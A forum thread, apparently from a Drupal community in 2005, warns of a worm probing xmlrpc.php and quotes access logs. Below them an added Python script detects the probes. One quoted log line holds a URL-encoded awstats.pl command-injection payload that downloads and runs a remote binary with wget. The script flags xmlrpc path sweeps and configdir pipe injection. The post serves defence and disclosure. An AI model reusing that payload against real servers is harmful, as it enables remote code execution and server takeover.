Hi all,
I'm sure the security warning on the Drupal front page is referring to this, but I think it's worth
another mention, as there is now a worm currently making the rounds which makes use of this exploit.
This morning I have had several hits on my server from the worm and it looks like it will
pick up.
Grep of access logs:
216.131.91.x - - [08/Nov/2005:12:12:09 +0000] "POST /xmlsrv/xmlrpc.php
216.131.91.x - - [08/Nov/2005:12:12:06 +0000] "POST /xmlrpc.php
216.131.91.x - - [08/Nov/2005:12:12:01 +0000] "POST /drupal/xmlrpc.php
...and several other locations as well.
Additionally:
216.131.91.x - - [08/Nov/2005:12:11:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%
20216%2e102%2e212%2e115;echo%20YYY;echo|
See http://vil.nai.com/vil/content/v_136821.htm for more details.
cheers
jono
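The two patterns in the log excerpt above can be turned into a simple check. This is an added example, not part of the original post: it flags any client that POSTs to xmlrpc.php under several different directories and any awstats.pl request whose configdir parameter contains a pipe. The function name scan, the finding labels, the threshold of three paths and the sample log lines are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format prefix: client address, then method and request target.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+)')

# Constructed sample lines: documentation addresses, harmless marker payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Nov/2005:12:11:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;echo| HTTP/1.0" 404 208',
    '192.0.2.10 - - [08/Nov/2005:12:12:01 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 208',
    '192.0.2.10 - - [08/Nov/2005:12:12:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 512',
    '192.0.2.10 - - [08/Nov/2005:12:12:09 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.0" 404 208',
    '203.0.113.5 - - [08/Nov/2005:12:20:00 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20YYY%7C HTTP/1.0" 404 208',
    '198.51.100.7 - - [08/Nov/2005:12:30:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [08/Nov/2005:12:31:00 +0000] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 9000',
]


def scan(lines, min_paths=3):
    """Return (client, finding, detail) tuples for the two probe patterns."""
    xmlrpc_paths = defaultdict(set)  # client -> distinct xmlrpc.php paths POSTed to
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        path, _, query = target.partition("?")
        if method == "POST" and path.lower().endswith("/xmlrpc.php"):
            xmlrpc_paths[client].add(path)
        elif path.lower().endswith("/awstats.pl"):
            # Split parameters first, then decode, so %7C is seen as a pipe.
            for param in query.split("&"):
                name, _, value = param.partition("=")
                if unquote(name) == "configdir" and "|" in unquote(value):
                    findings.append((client, "awstats-configdir-pipe", path))
    # A legitimate client talks to one endpoint; a scanner guesses many paths.
    for client, paths in sorted(xmlrpc_paths.items()):
        if len(paths) >= min_paths:
            findings.append((client, "xmlrpc-path-sweep", ",".join(sorted(paths))))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The path sweep is reported whatever the response status was, so a hit means the site was probed, not that it was vulnerable.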
Comments
RE: Worm Warning
Here's another link with some more information: http://www.lurhq.com/slapperv2.html
After searching drupal.org a bit, it looks like this xml-rpc vulnerability was patched a while ago (ca. 4.6.2). If anyone here is more knowledgeable about this vulnerability and its patch status, please chime in.